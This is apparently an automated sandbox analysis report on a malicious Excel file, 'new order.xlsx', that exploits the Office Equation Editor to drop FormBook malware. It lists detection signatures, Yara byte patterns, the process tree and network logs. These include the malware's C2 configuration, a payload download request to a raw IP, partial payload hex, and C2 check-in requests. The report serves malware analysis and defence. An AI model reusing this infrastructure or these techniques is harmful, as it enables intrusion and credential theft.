Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report new order.xlsx

Overview

General Information

Sample Name:new order.xlsx
Analysis ID:452636
MD5:d59accd992813d35bb00a4b3f84c4ffe
SHA1:851d437a71d1a156e0adb9f553611865b8c90d94
SHA256:002e54405b1ce6dd9710be53d71e832fcffc92fb63fc8ef3a37d14e0867c4c10
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Execution from Suspicious Folder
Tries to detect virtualization through RDTSC time measurements
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2752 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2368 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2592 cmdline: 'C:\Users\Public\vbc.exe' MD5: 750919BD7E02E7821EFA1B1BD0ED4EDA)
      • vbc.exe (PID: 856 cmdline: C:\Users\Public\vbc.exe MD5: 750919BD7E02E7821EFA1B1BD0ED4EDA)
        • explorer.exe (PID: 1388 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • wlanext.exe (PID: 1428 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: 6F44F5C0BC6B210FE5F5A1C8D899AD0A)
            • cmd.exe (PID: 2544 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.conectaragora.com/n84e/"], "decoy": ["upscalebuyer.com", "qtict.net", "karlgillard.com", "fangsbags.com", "blackwhitebangtan.com", "lojaautomatica.com", "browbabelondon.com", "dupladocabelo.com", "tcheap3dwdshop.com", "htnmg.com", "globaltradeview.com", "instrumentwinebreathe.net", "futurejobstech.com", "notemanches.com", "myconventionalcooking.xyz", "doniang.com", "ouruiwh.com", "tecnologiatimes.com", "yxbmfc.com", "mae-baby.com", "alsiha2020.com", "zenqueue.com", "myomlineservicing.com", "justin-appel.com", "protectallfarms.com", "fairwaysxm.com", "msec-santander.com", "previem.com", "legifo.com", "reitzforrep.com", "oanicoin.com", "scorchonerecords.com", "hheiy35.com", "aurorabradfordoptometrists.com", "kailinsen.com", "ownerspreinspect.com", "instantfames.com", "wdi.technology", "compareionizers.com", "habbuhot.info", "thinking-diversity.com", "swagmansbreakfast.com", "thepegasusclub.com", "crazyhorseoutfitters.com", "flvrpodcast.com", "mz66a.com", "vineyardtrailrides.com", "khazana-bazaar.com", "m-corgroup.com", "kidsnbuds.com", "whatsprosender.com", "lundagers.com", "betterhealthdc.com", "mehtalawgroup.com", "contex33.xyz", "fastloanflorida.net", "lautaigia.net", "792argonne.com", "xtravigant.com", "anbotechsolution.com", "minipockethouse.com", "ehubo3y.com", "greaterdenver.online", "batracomputer.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166c9:$sqlite3step: 68 34 1C 7B E1
    • 0x167dc:$sqlite3step: 68 34 1C 7B E1
    • 0x166f8:$sqlite3text: 68 38 2A 90 C5
    • 0x1681d:$sqlite3text: 68 38 2A 90 C5
    • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 13 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      7.2.vbc.exe.400000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        7.2.vbc.exe.400000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        7.2.vbc.exe.400000.1.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158c9:$sqlite3step: 68 34 1C 7B E1
        • 0x159dc:$sqlite3step: 68 34 1C 7B E1
        • 0x158f8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a1d:$sqlite3text: 68 38 2A 90 C5
        • 0x1590b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a33:$sqlite3blob: 68 53 D8 7F 8C
        7.2.vbc.exe.400000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          7.2.vbc.exe.400000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          Exploits:

          barindex
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 103.155.80.130, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2368, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2368, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\bin[1].exe

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2368, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2592
          Sigma detected: Execution from Suspicious FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2368, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2592

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.conectaragora.com/n84e/"], "decoy": ["upscalebuyer.com", "qtict.net", "karlgillard.com", "fangsbags.com", "blackwhitebangtan.com", "lojaautomatica.com", "browbabelondon.com", "dupladocabelo.com", "tcheap3dwdshop.com", "htnmg.com", "globaltradeview.com", "instrumentwinebreathe.net", "futurejobstech.com", "notemanches.com", "myconventionalcooking.xyz", "doniang.com", "ouruiwh.com", "tecnologiatimes.com", "yxbmfc.com", "mae-baby.com", "alsiha2020.com", "zenqueue.com", "myomlineservicing.com", "justin-appel.com", "protectallfarms.com", "fairwaysxm.com", "msec-santander.com", "previem.com", "legifo.com", "reitzforrep.com", "oanicoin.com", "scorchonerecords.com", "hheiy35.com", "aurorabradfordoptometrists.com", "kailinsen.com", "ownerspreinspect.com", "instantfames.com", "wdi.technology", "compareionizers.com", "habbuhot.info", "thinking-diversity.com", "swagmansbreakfast.com", "thepegasusclub.com", "crazyhorseoutfitters.com", "flvrpodcast.com", "mz66a.com", "vineyardtrailrides.com", "khazana-bazaar.com", "m-corgroup.com", "kidsnbuds.com", "whatsprosender.com", "lundagers.com", "betterhealthdc.com", "mehtalawgroup.com", "contex33.xyz", "fastloanflorida.net", "lautaigia.net", "792argonne.com", "xtravigant.com", "anbotechsolution.com", "minipockethouse.com", "ehubo3y.com", "greaterdenver.online", "batracomputer.com"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\bin[1].exeReversingLabs: Detection: 32%
          Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 32%
          Multi AV Scanner detection for submitted fileShow sources
          Source: new order.xlsxVirustotal: Detection: 30%Perma Link
          Source: new order.xlsxReversingLabs: Detection: 28%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2373008475.0000000000210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2372975665.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2246311708.0000000000460000.00000040.00000001.sdmp, type: MEMORY
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\bin[1].exeJoe Sandbox ML: detected
          Source: 7.2.vbc.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: vbc.exe, wlanext.exe
          Source: Binary string: wlanext.pdb source: vbc.exe, 00000007.00000002.2246150655.00000000002A9000.00000004.00000020.sdmp
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4x nop then pop edi
          Source: global trafficDNS query: name: www.thinking-diversity.com
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.155.80.130:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.155.80.130:80
          Source: excel.exeMemory has grown: Private usage: 4MB later: 74MB

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2019696 ET TROJAN Possible MalDoc Payload Download Nov 11 2014 192.168.2.22:49167 -> 103.155.80.130:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.conectaragora.com/n84e/
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 22 Jul 2021 15:11:11 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.20Last-Modified: Wed, 21 Jul 2021 22:09:30 GMTETag: "b0200-5c7a96cb69dfd"Accept-Ranges: bytesContent-Length: 721408Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 35 97 f8 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 f6 0a 00 00 0a 00 00 00 00 00 00 8e 14 0b 00 00 20 00 00 00 20 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c 14 0b 00 4f 00 00 00 00 20 0b 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 f4 0a 00 00 20 00 00 00 f6 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 58 06 00 00 00 20 0b 00 00 08 00 00 00 f8 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 0b 00 00 02 00 00 00 00 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 14 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 58 ed 09 00 e4 26 01 00 03 00 00 00 e0 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e6 4f 11 7a bb aa 11 a4 54 af 14 0e 18 4e 1f b2 7e 2f e0 d0 10 2d e5 ba c2 08 75 c0 0a 4a 46 84 79 3f ae ef 45 5c d5 21 7f 3c f3 5f 91 c7 cb 7c 12 64 49 a9 c0 36 fc 99 f9 13 da 5c 84 10 3c a7 e6 19 6a fb 99 18 14 cc 0d 06 39 d0 cd d3 a7 8d 23 60 04 c4 87 55 cd 45 8f 04 06 13 83 62 f5 c3 bd 16 98 84 e2 ca c1 75 a7 90 70 a0 88 07 46 89 2b d3 ea 6c 71 cd f2 29 84 45 3d 6d 15 9e c0 c6 32 ce 18 e9 6d 8f 27 b8 38 2f 1a 64 6b b2 9f af c4 ac ea 15 f7 59 d1 4a 15 66 98 cc 6c 90 9b b9 68 d6 4e c0 76 b3 39 42 b6 2a da b8 a5 e2 99 f5 8e 8d 80 92 86 35 25 ee 6b 4f 55 41 4b a5 02 fb 0a 84 1d 8d 5e 0b ee e4 63 30 56 07 11 9a 30 85 44 e5 e8 1f f2 b5 d7 97 9a 83 b4 f4 99 e7 f5 1e 9b f2 f9 18 03 8a 1e e9 0e d1 53 e8 b8 c4 e6 1d 90 a1 f4 94 6b 31 ce 15 63 5f be 27 54 91 c9 7a 69 3a 8c ca fe 15 cd 42 ff 17 72 ff 2a 76 96 63 a1 4e 14 72 11 50 e4 fd 6f fe 17 f5 7b 8a ac c5 12 28 0b b2 f9 4d ee 3
          Source: global trafficHTTP traffic detected: GET /n84e/?m8ot=8pa4DPp09N0DbNR0&YP=KbrClequBVdtRHK/gZ2KmWZGYK0xt8ME2AlExBVUQacHPbAvPt6PKzpjA4rIGWPVOlDf0Q== HTTP/1.1Host: www.thinking-diversity.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n84e/?YP=YB5mtasMUEHgcdBg3w1JzInb0sE5RwTjc/Tqop+T4aXdM6WeS8rV/Q3f3EZlzbjbZYjOJg==&m8ot=8pa4DPp09N0DbNR0 HTTP/1.1Host: www.globaltradeview.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 199.59.242.153 199.59.242.153
          Source: Joe Sandbox ViewASN Name: BODIS-NJUS BODIS-NJUS
          Source: Joe Sandbox ViewASN Name: TWIDC-AS-APTWIDCLimitedHK TWIDC-AS-APTWIDCLimitedHK
          Source: global trafficHTTP traffic detected: GET /kung/bin.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.155.80.130Connection: Keep-Alive
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\238B5502.emfJump to behavior
          Source: global trafficHTTP traffic detected: GET /kung/bin.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.155.80.130Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /n84e/?m8ot=8pa4DPp09N0DbNR0&YP=KbrClequBVdtRHK/gZ2KmWZGYK0xt8ME2AlExBVUQacHPbAvPt6PKzpjA4rIGWPVOlDf0Q== HTTP/1.1Host: www.thinking-diversity.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n84e/?YP=YB5mtasMUEHgcdBg3w1JzInb0sE5RwTjc/Tqop+T4aXdM6WeS8rV/Q3f3EZlzbjbZYjOJg==&m8ot=8pa4DPp09N0DbNR0 HTTP/1.1Host: www.globaltradeview.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
